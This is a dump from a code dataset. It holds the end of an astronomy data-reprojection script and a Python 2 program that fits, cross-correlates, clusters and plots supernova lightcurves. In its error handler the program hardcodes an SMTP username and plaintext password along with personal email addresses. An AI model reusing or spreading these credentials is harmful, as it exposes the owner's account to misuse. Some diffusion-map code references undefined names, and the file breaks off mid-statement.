".aca_excasymm_spatialmatch.fits"
targ_cube = aca_co21_data_path("full_mosaic/12CO21/M33_ACA_12CO21_2p6kms_excludeasymmbeams_commonbeam.image_K.fits")
reproject_cube(seventeenB_1kms_wGBT_HI_file_dict['Cube'],
targ_cube,
out_name,
output_folder=out_folder,
save_spectral=False,
is_huge=True,
reproject_type='spatial',
common_beam=False,
verbose=True,
chunk=40)
run_pipeline(osjoin(out_folder, out_name),
out_folder,
masking_kwargs={"method": "ppv_connectivity",
"save_cube": True,
"is_huge": True,
"smooth_chans": 6,
"min_chan": 4,
"peak_snr": 4.,
"min_snr": 2,
"edge_thresh": 1,
"verbose": True,
},
moment_kwargs={"num_cores": 1,
"verbose": False,
"chunk_size": 1e5,
"make_peakvels": False},)
if run_fullmos_round:
out_name = seventeenB_1kms_wGBT_HI_file_dict['Cube'].split("/")[-1].rstrip(".fits") + \
".aca_fullmosaic_spatialmatch.fits"
targ_cube = aca_co21_data_path("full_mosaic/12CO21/M33_ACA_12CO21_2p6kms_fullmosaic_roundbeam.image_K.fits")
reproject_cube(seventeenB_1kms_wGBT_HI_file_dict['Cube'],
targ_cube,
out_name,
output_folder=out_folder,
save_spectral=False,
is_huge=True,
reproject_type='spatial',
common_beam=True,
verbose=True,
chunk=40)
run_pipeline(osjoin(out_folder, out_name),
out_folder,
masking_kwargs={"method": "ppv_connectivity",
"save_cube": True,
"is_huge": True,
"smooth_chans": 6,
"min_chan": 4,
"peak_snr": 4.,
"min_snr": 2,
"edge_thresh": 1,
"verbose": True,
},
moment_kwargs={"num_cores": 1,
"verbose": False,
"chunk_size": 1e5,
"make_peakvels": False},)
|
mit
| 4,816,399,364,986,148,000
| 35.018349
| 120
| 0.47784
| false
| 3.871795
| false
| true
| false
|
mdepasca/miniature-adventure
|
miniature_adventure.py
|
1
|
51544
|
import argparse
import os
from os import path
import subprocess
import sys
import socket
import time
import warnings
from math import floor
import gc # garbage collector
import smtplib
import numpy as np
from scipy import signal, linalg
from matplotlib import pyplot as plt
import GPy
import classes as cls
import utilities as util
from utilities import bcolors
# import rpy2.robjects as ro
# from rpy2.robjects.packages import importr
# from rpy2.robjects.numpy2ri import numpy2ri
# # Activate automatic conversion of ndarray to R objects
# ro.conversion.py2ri = numpy2ri
from progressbar import ProgressBar, SimpleProgress, ETA, Percentage, Bar, \
AnimatedMarker, Timer, Counter
if __name__ == "__main__":
# gc.set_debug(gc.DEBUG_LEAK)
# Parsing input from command line
parser = argparse.ArgumentParser(
description = "SN lightcurve fitter and classifier.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
actionGroup = parser.add_argument_group('ACTION')
inputGroup = parser.add_argument_group('INPUT')
"""
ACTION OPTIONS
----------------------------------------------------------------------------
"""
actionGroup.add_argument(
"--fit", dest="fit",
action="store_true",
help="Fit lightcurves with Gaussian processes method."
)
actionGroup.add_argument(
'--prior', dest='prior',
action='store_true', help='Use priors in GP regression.'
)
actionGroup.add_argument(
'--length', dest='testLength',
action='store_true',
help='Set length scale hyper parameter to random value to ease \
optimization.'
)
actionGroup.add_argument(
"--cross-correlation", dest="crossCor",
action="store_true",
help="Performs cross correlation between non peaked lcs (with maximum in \
r-band at one of the MJD extremes) and all the peaked lcs. Produces \
an estimate for maximum in r-band. VERY TIME CONSUMING."
)
actionGroup.add_argument(
"--distance-matrix", dest="distMatrix",
action="store_true",
help="Calculate distance between fitted lightcurves in same band. \
It is used to build a diffusion map (see Coifman & Lafon (2006) \
and Lafon & Lee (2006)).")
actionGroup.add_argument(
"--diffuse", dest="diffuse",
action="store_true",
help="Computes the diffusion map coefficients. Run together or after \
--distance-matrix option. Uses `diffusionMap` R package developed \
by Joseph Richards.")
actionGroup.add_argument(
"--train", dest="train",
action="store_true",
help="Train the classifier - Random Forest. Uses `randomForest` R \
package.")
actionGroup.add_argument(
"--classify", dest="classify",
action="store_true")
actionGroup.add_argument(
"--plot", dest="plot",
action="store_true",
help="Save on `pdf` file the plot of fitting curve over data.")
actionGroup.add_argument(
'--nice-plots', dest='nicePlots',
action='store_true',
help='Produces plot suitable for publication (pdf, 300dpi).'
)
"""-------------------------------------------------------------------------
INPUT OPTIONS
----------------------------------------------------------------------------
"""
inputGroup.add_argument(
"--data-directory", dest="dirData",
default="train_data" + os.sep + "SIMGEN_PUBLIC_DES",
help="Path to directory containing training data.")
inputGroup.add_argument(
"--fit-directory", dest="dirFit",
default="results" + os.sep + "FIT",
help="Path to directory containing fitted data.")
# the use of this keyword is developed in dev_magnitudes branch
inputGroup.add_argument(
"--mag", dest="mag",
action="store_true",
help="Reads in magnitudes from file."
)
inputGroup.add_argument(
"--fit-file", dest="fitFile",
help="Path to file in which to dump fitting results.")
inputGroup.add_argument(
"-f", "--file",
help="")
inputGroup.add_argument(
"-c", "--candidate", dest="cand",
default=-1, type=int,
help="ID of a candidate."
)
inputGroup.add_argument(
"--all-bands", dest="allBands",
action="store_true",
help="Plot all bands --nice-plots option."
)
inputGroup.add_argument(
"-b", "--band", dest="band", default='r',
help="Which band to plot with --nice-plots.")
inputGroup.add_argument(
"--nBands", dest="nBands",
default=-1, type=int,
help="Number of bands to plot with --nice-plots.")
inputGroup.add_argument(
'--limits', nargs=2, dest='limits',
default=[0, 5], type=int,
help='Starting and ending indices for fitting and cross-correlation.'
)
inputGroup.add_argument(
'--offset', '-o', dest='offset',
default=0, type=int,
help='Offset for columns WRT limits (which refer to rows).'
)
inputGroup.add_argument(
'--plot-offset', dest='plotOffset',
default=-1, type=int,
help='Index offset from which to begin plotting light curves.'
)
"""-------------------------------------------------------------------------
"""
args = parser.parse_args()
bands = ['g', 'r', 'i', 'z']
else:
pass
if __name__ == "__main__":
# os.system("clear")
fromAddress = 'mothra@oapd.inaf.it'
toAddress = 'marco.depa@gmail.com'
sent = False
indent = " "
resDir = "results"+os.sep
peakIdx = np.empty(0)
nopeakIdx = np.empty(0)
print bcolors.bldpur
print indent + "* * * * * * * * * * * * * * *"
print indent + "* Miniature Adventure *"
print indent + "* ------------------- *"
print indent + "* lightcurves fitting *"
print indent + "* and *"
print indent + "* SN classification *"
print indent + "* * * * * * * * * * * * * * *"
print bcolors.txtrst
if args.dirFit == 'results/FIT':
yesno = str(raw_input(indent + 'Set fit directory other than default (' + \
parser.get_default('dirFit') + ')? (y/n)'))
if yesno == 'y':
args.dirFit = str(raw_input(indent + 'Specify new directory '\
+'for fit: '))
if args.dirData[-1] != os.sep:
args.dirData += os.sep
if args.dirFit[-1] != os.sep:
args.dirFit += os.sep
print indent + 'Fit directory will be: ' + path.abspath(args.dirFit)
if not os.path.exists(path.abspath(args.dirFit)):
os.makedirs(path.abspath(args.dirFit))
start_time = time.time()
"""
Get list of files in data directory and fit directory
----------------------------------------------------------------------------
"""
p = subprocess.Popen("ls *SN*.DAT", shell=True, stdout=subprocess.PIPE,
cwd=args.dirData)
lsDirData = p.stdout.read()
lsDirData = lsDirData.split('\n')
lsDirData.sort()
lsDirData.remove('')
p = subprocess.Popen("ls *SN*.DAT", shell=True, stdout=subprocess.PIPE,
cwd=args.dirFit)
lsDirFit = p.stdout.read()
lsDirFit = lsDirFit.split('\n')
lsDirFit.sort()
lsDirFit.remove('')
"""-------------------------------------------------------------------------
"""
"""
PERFORMS LCs FITTING
"""
if args.fit:
if args.limits[1] > len(lsDirData):
print indent + \
"WARNING: upper limit > than the number of files. Corrected.\n"
args.limits[1] = len(lsDirData)
filePath = args.dirFit + 'PEAKED_{:<}_{:<5.3f}.LIST'.format(
socket.gethostname(), time.time()
)
fPeaked = open(filePath, 'w')
filePath = args.dirFit + 'NOPEAKED_{:<}_{:<5.3f}.LIST'.format(
socket.gethostname(), time.time()
)
fNopeaked = open(filePath, 'w')
# Relevant input data
print "\n" + indent + "[1] * Fit lightcurves ..."
print "\n" + indent + "Index interval [{:<},{:<})".format(
args.limits[0], args.limits[1]
)
print "\n" + indent + \
"Data directory: " + os.curdir + args.dirData
print "\n" + indent \
+ "Number of candidates = {:<d}".format(len(lsDirData))
"""
GP kernel specification
------------------------------------------------------------------------
"""
# kern = GPy.kern.RatQuad(1)
kern = GPy.kern.RBF(1)
# kern = GPy.kern.Matern32(1)
# kern = GPy.kern.Matern52(1)
"""---------------------------------------------------------------------
"""
print "\n" + indent \
+ "Data will be smoothed using GP kernel " + kern.name.upper()
print '\n' + indent + \
"INDEX | SN ID | BAND"
for i in range(args.limits[0], args.limits[1]):
filePath = path.splitext(lsDirData[i])[0] + "_FIT.DAT"
"""
Check if file with fit results already exits. If positive skip
to next loop iteration.
"""
if filePath in lsDirFit:
continue
candidate = util.get_sn_from_file(
args.dirData + lsDirData[i],
args.mag
)
# Creating SupernovaFit object
candidateFit = cls.SupernovaFit(candidate, kern.name)
for b in candidate.lcsDict.keys():
# Correcting for time dilution
epoch = util.time_correct(
candidate.lcsDict[b].mjd,
candidate.zSpec if candidate.zSpec else candidate.zPhotHost
)
# Correcting for absorption
flux = util.correct_for_absorption(
candidate.lcsDict[b].flux,
candidate.MWEBV, b
)
errFlux = candidate.lcsDict[b].fluxErr
if (candidate.lcsDict[b].badCurve) or (len(flux) <= 3):
candidateFit.lcsDict[b].badCurve = True
print indent + bcolors.FAIL + \
"{:<} {:<} {:<} Bad Curve".format(i, candidate.SNID, b) + \
bcolors.txtrst
"""
>>> if 'break' instead of 'continue' the candidate would not be
>>> processed and the further code would be easier (no double
>>> checks both on data and fit).
"""
continue
"""
Fitting Lightcurve
----------------------------------------------------------------
"""
try:
predMjd, predFlux, predErr, GPModel = util.gp_fit(
epoch, flux, errFlux,
kern, n_restarts=10,
parallel=False,
test_length=args.testLength,
test_prior=args.prior)
except linalg.LinAlgError as e:
if sent == False:
server = smtplib.SMTP('mailauth.oapd.inaf.it',587)
server.starttls()
server.login('marco.depascale', 'M@p3d_8$')
msg = 'Subject: LinAlgError\n\n' + \
'index = {:<d}, SNID = {:<d}'.format(i, candidate.SNID)
server.sendmail(fromAddress, toAddress, msg)
server.close()
sent = True
"""
If a LinAlgError is raised the light curve won't be saved.
"""
print indent + \
"{:>5d} {:>5d} {:>4s} > FAIL".format(
i, candidate.SNID, b
) + bcolors.FAIL + ' LinAlgError' + bcolors.txtrst
candidateFit.r.badCurve = True
raise ValueError(
'LinAlgError from GPy. Mail sent to {:s}'.format(
toAddress
)
)
else:
candidateFit.set_lightcurve(b, predMjd, predFlux, predErr)
print indent + bcolors.OKGREEN + \
"{:>5d} {:>5d} {:>4s} > DONE".format(
i, candidate.SNID, b
) + bcolors.txtrst
"""-------------------------------------------------------------
"""
else:
"""
Saving fit results on file
----------------------------------------------------------------
"""
if (candidateFit.r.badCurve == False):
filePath = args.dirFit + \
path.splitext(lsDirData[i])[0] + "_FIT.DAT"
candidateFit.save_on_txt(filePath)
print indent + 'file saved!'
if candidateFit.peaked:
peakIdx = np.append(peakIdx, i)
fPeaked.write('{:<}\n'.format(filePath))
else:
nopeakIdx = np.append(nopeakIdx, i)
fNopeaked.write('{:<}\n'.format(filePath))
"""-------------------------------------------------------------
"""
gc.collect()
# free memory
gc.collect()
fPeaked.close()
fNopeaked.close()
filePath = 'peaked_{:<}_{:<5.3f}.dat'.format(
socket.gethostname(), time.time()
)
np.savetxt(args.dirFit + filePath, peakIdx,
header='Indexes of fitted LCs with r maximum.', fmt='%d')
filePath = args.dirFit + 'nopeaked_{:<}_{:<5.3f}.dat'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, nopeakIdx,
header='Indexes of fitted LCs without an r maximum.', fmt='%d')
gc.collect()
"""#########################################################################
############################################################################
PERFORMING CROSS-CORRELATION
############################################################################
############################################################################
"""
if args.crossCor:
"""
Files are sorted by SNID.
In the following, peakIdx and nopeakIdx contain indexes referring to the
full list of files. For this reason the list of files is queried on
dirData. It is then filtered using the above variables.
"""
print "\n" + indent + bcolors.undwht + \
"(*) Calculate cross-correlation of not peaked- with " + \
"peaked-lcs ..." + bcolors.txtrst
print "\n" + indent + "Interval [{:<},{:<})".format(args.limits[0], args.limits[1])
filePath = args.dirFit + 'PEAKED.LIST'
if path.exists(filePath) == False:
# create the file concatenating existing partial files
print '{:<s} created!'.format(filePath)
peakedFileList = util.list_files(args.dirFit+'PEAKED*.LIST')
util.concat_files(peakedFileList, filePath)
peakList = np.loadtxt(filePath, dtype=np.str)
filePath = args.dirFit + 'NOPEAKED.LIST'
if path.exists(filePath) == False:
# create the file from existing partial files
print '{:<s} created!'.format(filePath)
noPeakedFileList = util.list_files(args.dirFit+'NOPEAKED*.LIST')
util.concat_files(noPeakedFileList, filePath)
tmp = np.loadtxt(filePath, dtype=np.str)
if tmp.size == 1:
nopeakList = np.asarray([tmp])
else:
nopeakList = np.asarray(tmp)
if args.limits[1] > len(nopeakList):
args.limits[1] = len(nopeakList)
#
# filePath = 'repeats.txt'
# repeats = np.loadtxt(args.dirFit + filePath, dtype=np.str)
filePath = 'cross_correlated_files_{:<5.3f}.dat'.format(time.time())
reWrite = open(args.dirFit + filePath, 'w')
prog = 0
for i in nopeakList[args.limits[0]:args.limits[1]]:
z = 0 # goes on peakIdx to index the progress bar
"""
READ DATA FROM NOT-PEAKED FILE
creates a Supernova object
"""
filePath = i
try:
tmpSN = util.get_sn_from_file(filePath)
print "Progress: {:<d} -- {:<}".format(prog, filePath)
prog += 1
ccIndent = "ID:{: ^7d}".format(tmpSN.SNID)
widgets = [ccIndent, Percentage(), ' ',
Bar(marker='#',left='[',right=']'),
' ', ETA()]
pbar = ProgressBar(widgets=widgets, maxval=len(peakList)).start()
except IOError:
print "IOError: {:<}".format(filePath)
continue
if tmpSN.r.badCurve:
print "IOError (BAD r curve): {:<}".format(filePath)
continue
"""
create SupernovaFit object
"""
notPeaked = cls.SupernovaFit(tmpSN)
for l in tmpSN.lcsDict.keys():
notPeaked.set_lightcurve(l,
tmpSN.lcsDict[l].mjd,
tmpSN.lcsDict[l].flux,
tmpSN.lcsDict[l].fluxErr
)
"""
Shifting mjds in not-peaked
"""
notPeaked.shift_mjds()
ccMax = list()#np.zeros(peakIdx.size)
k = 0 # goes on ccMax
# for j in peakIdx:
for j in peakList:
"""
READ DATA FROM PEAKED FILE
"""
# if j in repeats:
# print indent + bcolors.WARNING + \
# 'File appears also in unpeaked list: ignoring it.' + \
# bcolors.txtrst
# continue
filePath = j#args.dirFit + lsDirData[j][0:12] + '_FIT.DAT'
try:
tmpSN = util.get_sn_from_file(filePath)
except IOError:
print indent + bcolors.WARNING + \
'File appears also in peaked list but it does not exists: ignoring it.' + \
bcolors.txtrst
continue
if tmpSN.r.badCurve:
print indent + bcolors.WARNING + \
'Peaked file has bad r curve: ignoring it.' + \
bcolors.txtrst
continue
peaked = cls.SupernovaFit(tmpSN)
for l in tmpSN.lcsDict.keys():
peaked.set_lightcurve(l,
tmpSN.lcsDict[l].mjd,
tmpSN.lcsDict[l].flux,
tmpSN.lcsDict[l].fluxErr
)
"""
Shifting mjds in peaked
"""
peaked.shift_mjds()
"""
Performing cross-correlation
"""
ycorr = signal.correlate(
notPeaked.normalized_flux('r'),
peaked.normalized_flux('r')
)
xcorr = np.arange(ycorr.size)
lags = xcorr - (
len(notPeaked.normalized_flux('r'))-1
)
distancePerLag = (
notPeaked.r.shiftedMjd[-1] - \
notPeaked.r.shiftedMjd[0])/float(
len(notPeaked.r.shiftedMjd)
)
offsets = -lags*distancePerLag
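# Worked example with made-up numbers: if the not-peaked r curve has 100
# samples spanning 90 days, distancePerLag is 0.9 days per lag, and a
# maximum of ycorr at lag +5 maps to an offset of -4.5 days. The offsets
# from all peaked templates are averaged below into ccMjdMaxFlux, the
# estimate of where the missing r-band maximum lies.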
# ccMax[k] = offsets[np.argmax(ycorr)]
ccMax.append(offsets[np.argmax(ycorr)])
# k += 1
pbar.update(z+1)
z += 1
# gc.collect()
notPeaked.ccMjdMaxFlux = np.mean(ccMax)#ccMax.mean()
"""
re-writing file of not peaked lc to include information on maximum
position from CC.
"""
filePath = i#args.dirFit + lsDirData[i][0:12] + '_FIT.DAT'
notPeaked.save_on_txt(filePath)
reWrite.write(filePath+'\n')
pbar.finish()
# gc.collect()
reWrite.close()
print 'CC ended!'
gc.collect()
"""
CALCULATING DISTANCE MATRIX
needs:
- args.distMatrix
- args.limits
- args.offset
- args.dirFit
"""
if args.distMatrix:
if not os.path.exists(path.abspath(args.dirFit + 'distance_matrix' + os.sep)):
os.makedirs(path.abspath(args.dirFit + 'distance_matrix' + os.sep))
"""
Calculate distance between fitted lightcurves.
Distance values are saved in a R matrix. This will be used by the R
package `diffusionMap` through rpy2 Python package.
"""
j_offset = args.offset
i_start = args.limits[0]
i_end = args.limits[1]
j_start = i_start + j_offset
j_end = (i_end + j_offset) if (i_end+j_offset<=len(lsDirFit)) else len(lsDirFit)
print "\n" + indent + bcolors.undwht + \
"(*) Calculate distances between lightcurves ..." + \
bcolors.txtrst
print indent + "Rows in [{:<d}, {:<d})".format(i_start, i_end)
print indent + "Cols in [{:<d}, {:<d})".format(j_start, j_end)
"""
setting value for big distance
"""
distFlag = 5
missColCount = 0
missRowlist = list()
bandDict = {
'g':0,
'r':1,
'i':2,
'z':3
}
widgets = [indent, 'Processing:', ' ', Counter(), ' ',
AnimatedMarker(), indent, Timer()]
# creating list of 4 lists
distList = list([[], [], [], []])
nCols = 0
# distList = np.zeros((4,
# len(lsDirFit[i_start:i_end]), len(lsDirFit[i_start:i_end])),
# dtype=float
# )
pbar = ProgressBar(widgets=widgets, maxval=(i_end-i_start)).start()
for i in range(i_start, i_end):
missColCount = 0
"""
Reading in i-candidate
"""
tmpSN = util.get_sn_from_file(
args.dirFit+lsDirFit[i]
)
if tmpSN.r.badCurve:
# nothing has to be added to the distance matrix. Print and
#
# continue to next object
# print "{:<} Has bad curve in r band - ".format(lsDirFit[i]) + \
# "THE FILE HAS TO BE DELETED" +\
# " indices {:<d}".format(i)
missRowlist.append(i)
continue
iCandidate = cls.SupernovaFit(tmpSN)
for b in tmpSN.lcsDict.keys():
# set_lightcurve set also if the lc is peaked or not
iCandidate.set_lightcurve(b,
tmpSN.lcsDict[b].mjd,
tmpSN.lcsDict[b].flux,
tmpSN.lcsDict[b].fluxErr
)
"""
Shifting mjds in i-candidate
"""
iCandidate.shift_mjds()
if iCandidate.peaked == False:
# print i, iCandidate.SNID
"""
keeping to perform check with other non peaked LC
"""
iElMax = iCandidate.r.shiftedMjd.index(0.)
"""
correcting using CC results
"""
for b in bands:
iCandidate.lcsDict[b].shiftedMjd = [
iCandidate.lcsDict[b].shiftedMjd[l] +
iCandidate.ccMjdMaxFlux for l in range(len(
iCandidate.lcsDict[b].shiftedMjd
))
]
iElSize = iCandidate.r.size
iPeaked = iCandidate.peaked
for j in range(j_start, j_end):
"""
if this SN has badCurve in this band it will be far from all
the others by default.
this saves time by not opening all the other files
to create new SupernovaFit objects.
"""
if j == i:
# filling elements on the distance matrix diagonal
for b in bands:
# adding one element to each sub list in distList
distList[bandDict[b]].append(0.)
# distList[bandDict[b], i-i_start, j-j_start] = 0.
continue
if j < i:
# filling matrix elements below the diagonal
if j in missRowlist:
missColCount += 1
continue
for b in bands:
# appending the symmetric element in the list: i-i_start
distList[bandDict[b]].append(
distList[bandDict[b]][
(j-j_start-missColCount)*nCols+\
i-i_start-len(missRowlist)
])
# distList[bandDict[b], i-i_start, j-j_start] = \
# distList[bandDict[b], j-j_start, i-i_start]
continue # jump to the next iteration of the loop
"""
Reading in j-candidate
"""
try:
tmpSN = util.get_sn_from_file(
args.dirFit+lsDirFit[j]
)
except IndexError:
print j, len(lsDirFit)
raise IndexError("list index out of range")
if tmpSN.r.badCurve:
# nothing has to be added to the distance matrix. Print and
#
# continue to next object
# print "{:<} Has bad curve in r band -".format(lsDirFit[j])+\
# " THE FILE HAS TO BE DELETED:" +\
# " indices {:<d}, {:<d}".format(i, j)
continue
jCandidate = cls.SupernovaFit(tmpSN)
for b in tmpSN.lcsDict.keys():
jCandidate.set_lightcurve(b,
tmpSN.lcsDict[b].mjd,
tmpSN.lcsDict[b].flux,
tmpSN.lcsDict[b].fluxErr
)
"""
Shifting mjds in j-candidate
"""
jCandidate.shift_mjds()
if jCandidate.peaked == False:
"""
keeping to perform check with other non peaked LC
"""
jElMax = jCandidate.r.shiftedMjd.index(0.)
"""
correcting using CC results
"""
for b in bands:
jCandidate.lcsDict[b].shiftedMjd = [
jCandidate.lcsDict[b].shiftedMjd[l] +
jCandidate.ccMjdMaxFlux for l in range(len(
jCandidate.lcsDict[b].shiftedMjd
))
]
jElSize = jCandidate.r.size
for b in bands:
if not jCandidate.lcsDict[b].badCurve \
and not iCandidate.lcsDict[b].badCurve:
distList[bandDict[b]].append(
iCandidate.get_distance(jCandidate, b)
)
# distList[bandDict[b], i-i_start, j-j_start] = \
# iCandidate.get_distance(jCandidate, b)
else:
# in case of bad curve
"""
This works like a flag. These elements will be set
equal to a neutral value (the mean of the other)
"""
distList[bandDict[b]].append(distFlag)
# distList[bandDict[b], i-i_start, j-j_start] = distFlag
"""
# >>> !! Checking for i being equal to its beginning value in the loop
does not take into account the
possibility of the first SN having a bad r curve, in which case
the loop will never arrive here, since it is reset by a continue.
Checking on nCols being still equal to zero is much better, since it is
the only way to verify if the first loop has been completed.
"""
# if (i == i_start):
if (nCols == 0):
nCols = len(distList[0])
print 'nCols updated! {:<d}'.format(nCols)
pbar.update(i-i_start+1)
pbar.finish()
# del iCandidate
# del jCandidate
# del tmpSN
gc.collect()
distMatrix = np.zeros((4,
len(distList[0])/nCols, nCols),
dtype=float
)
for b in bands:
distMatrix[bandDict[b]] = np.reshape(
distList[bandDict[b]], (len(distList[bandDict[b]])/nCols, nCols)
)
"""
distList is no longer used from this point on; delete it to save memory
"""
del distList
gc.collect()
# fixing flagged elements
# raise SystemExit
if distMatrix[0, distMatrix[0] == distFlag].size > 0:
ind = np.where(distMatrix[0] == distFlag)
distMatrix[0, ind[0], ind[1]] = np.add(
np.add(
distMatrix[1, ind[0], ind[1]],
distMatrix[2, ind[0], ind[1]]
),
distMatrix[3, ind[0], ind[1]]
)/3.
if distMatrix[1, distMatrix[1] == distFlag].size > 0:
ind = np.where(distMatrix[1] == distFlag)
# distMatrix[1, ind[0], ind[1]] = distMatrix[1,:,:].max()
distMatrix[1, ind[0], ind[1]] = np.add(
np.add(
distMatrix[0, ind[0], ind[1]],
distMatrix[2, ind[0], ind[1]]
),
distMatrix[3, ind[0], ind[1]]
)/3.
if distMatrix[2, distMatrix[2] == distFlag].size > 0:
ind = np.where(distMatrix[2] == distFlag)
# distMatrix[2, ind[0], ind[1]] = distMatrix[2].max()
distMatrix[2, ind[0], ind[1]] = np.add(
np.add(
distMatrix[0, ind[0], ind[1]],
distMatrix[1, ind[0], ind[1]]
),
distMatrix[3, ind[0], ind[1]]
)/3.
if distMatrix[3, distMatrix[3] == distFlag].size > 0:
ind = np.where(distMatrix[3] == distFlag)
# distMatrix[3, ind[0], ind[1]] = distMatrix[3].max()
distMatrix[3, ind[0], ind[1]] = np.add(
np.add(
distMatrix[0, ind[0], ind[1]],
distMatrix[1, ind[0], ind[1]]
),
distMatrix[2, ind[0], ind[1]]
)/3.
distMatrixSum = np.sum(distMatrix, 0)
"""
Saving on text files
"""
fileHeader = "distMatrix[{:<d}:{:<d},{:<d}:{:<d}] --- ".format(
i_start, i_end, j_start, j_end
) + \
"Created by {:<}".format(socket.gethostname())
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_Sum_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrixSum, fmt='%6.4f', header=fileHeader)
del distMatrixSum
gc.collect()
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_g_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrix[0], fmt='%6.4f', header=fileHeader)
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_r_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrix[1], fmt='%6.4f', header=fileHeader)
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_i_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrix[2], fmt='%6.4f', header=fileHeader)
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_z_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrix[3], fmt='%6.4f', header=fileHeader)
del distMatrix
gc.collect()
"""
CALCULATING DIFFUSION MAP
"""
if args.diffuse:
if 'diffusionMap' not in globals():
diffusionMap = importr('diffusionMap')
ndim = ro.r.attributes(Rmatrix)[0][0]
dmap = diffusionMap.diffuse(Rmatrix, neigen=5)
util.dump_pkl('diffusion_map.pkl', dmap)
"""
TRAINING RANDOM FOREST CLASSIFIER
"""
if args.train:
randomForest = importr('randomForest')
if 'dmap' not in globals():
print indent + 'Loading catalog from dump file ...'
dmap = util.open_pkl('tmp_diffusion_map.pkl')
dmap_rf = randomForest.randomForest(dmap)
"""
PLOT OBSERVATION AND FIT
--plot
"""
if args.plot:
timeMark = time.time()
"""
getting file list from directory
Files will be sorted by SNID
"""
print indent + 'Plotting ...'
'''
Column index is always increasing, no check on its value.
'''
nrows = 5
ncols = 5
"""
If plotOffset is not specified, get a proper random value
"""
if (args.plotOffset == -1):
np.random.RandomState
offset = int(np.random.uniform(low=0, high=len(lsDirFit)-nrows*ncols))
else:
offset = args.plotOffset
fig_g, ax_g = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(16.5, 11.7)#,
#tight_layout=True
)
fig_r, ax_r = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(16.5, 11.7)#,
#tight_layout=True
)
fig_i, ax_i = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(16.5, 11.7)#,
#tight_layout=True
)
fig_z, ax_z = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(16.5, 11.7)#,
# tight_layout=True
)
dictFig = {'g':fig_g,
'r':fig_r,
'i':fig_i,
'z':fig_z}
dictAx = {'g':ax_g,
'r':ax_r,
'i':ax_i,
'z':ax_z}
r = {'g':0,
'r':0,
'i':0,
'z':0}
c = {'g':0,
'r':0,
'i':0,
'z':0}
"""
Adjust subplot margins and title
"""
for b in dictFig.keys():
dictFig[b].subplots_adjust(
top=0.96, right=0.99, bottom=0.03, left=0.02,
wspace=0.08, hspace=0.13
)
dictFig[b].suptitle('band {:<1} - offset {:<d}'.format(b, offset))
GPkern = ''
for i in range(nrows*ncols):
"""
Getting the observational data from file
"""
candidate = util.get_sn_from_file(
args.dirData + lsDirData[i+offset]#candidateIdx]
)
"""
Reading fit data from file
"""
try:
tmpSN = util.get_sn_from_file(
args.dirFit+lsDirFit[i+offset],
magFlag=args.mag,
)
except IndexError:
warnStr = 'IndexError: list index out of range. '+\
'i={:<d}.'.format(i+offset)
print warnings.warn(warnStr)
print '\n'+indent+'Saving files as they are and stopping.'
else:
"""
Initializing SupernovaFit object
"""
fit = cls.SupernovaFit(tmpSN,
tmpSN.kern if hasattr(tmpSN, 'kern') else None)
if (i == 0) and hasattr(tmpSN, 'kern'):
GPkern = tmpSN.kern
for b in tmpSN.lcsDict.keys():
fit.set_lightcurve(b,
tmpSN.lcsDict[b].mjd,
tmpSN.lcsDict[b].flux,
tmpSN.lcsDict[b].fluxErr,
magFlag=args.mag
)
if fit.r.badCurve:
print 'SN ID{:>06d} has bad r band light curve!'.format(
fit.SNID)
# continue
else:
"""
Shift fit mjd to have 0 at r band maximum
"""
fit.shift_mjds()
"""
Fixing shiftedMjd for not-peaked LCs
"""
if (fit.peaked == False) and (fit.r.badCurve == False) :
"""
correcting using CC results
"""
for b in bands:
fit.lcsDict[b].shiftedMjd = [
el + fit.ccMjdMaxFlux for el in fit.lcsDict[b].shiftedMjd
]
for b in dictAx.keys():
"""
variable `data` initialized as light curve in band b for
cleaner code.
"""
data = candidate.lcsDict[b]
fit_b = fit.lcsDict[b]
fit_r = fit.lcsDict['r']
if c[b] > nrows-1:
c[b] = 0
r[b] += 1
xlim = dictAx[b][r[b], c[b]].get_xlim()
ylim = dictAx[b][r[b], c[b]].get_ylim()
dictAx[b][r[b], c[b]].set_xticks([0])
dictAx[b][r[b], c[b]].set_yticks([0])
dictAx[b][r[b], c[b]].set_xticklabels(['0'])
dictAx[b][r[b], c[b]].set_yticklabels(['0'])
if (data.badCurve == False) and (fit_b.badCurve == False) and (fit.r.badCurve == False):
epoch = util.time_correct(data.mjd,
candidate.zSpec if candidate.zSpec else candidate.zPhotHost)
epoch = [val-fit_r.mjd[fit_r.max_flux_index] for val in epoch]
if fit.peaked == False:
epoch = [val+fit.ccMjdMaxFlux for val in epoch]
flux = util.correct_for_absorption(data.flux,
candidate.MWEBV, b)
"""
Setting limits for plot axes
"""
if min(fit_b.flux) < min(flux):
y_min = min(fit_b.flux) - 3*max(fit_b.fluxErr)
else:
y_min = min(flux) - np.median(data.fluxErr)
if max(fit_b.flux) > max(flux):
y_max = max(fit_b.flux) + 3*max(fit_b.fluxErr)
else:
y_max = max(flux) + np.median(data.fluxErr)
dictAx[b][r[b], c[b]].set_ylim(y_min, y_max)
"""
Setting limits for fill_between (±1 fluxErr band)
"""
fluxUpLim = [val for val in [
fit_b.flux[el] + fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
fluxLowLim = [val for val in [
fit_b.flux[el] - fit_b.fluxErr[el]
for el in range(len(fit_b.flux))
]]
dictAx[b][r[b], c[b]].fill_between(fit_b.shiftedMjd,
fluxUpLim, fluxLowLim,
facecolor='red', alpha=0.4, linewidth=0.5)
"""
Setting limits for fill_between (±2 fluxErr band)
"""
fluxUpLim = [val for val in [
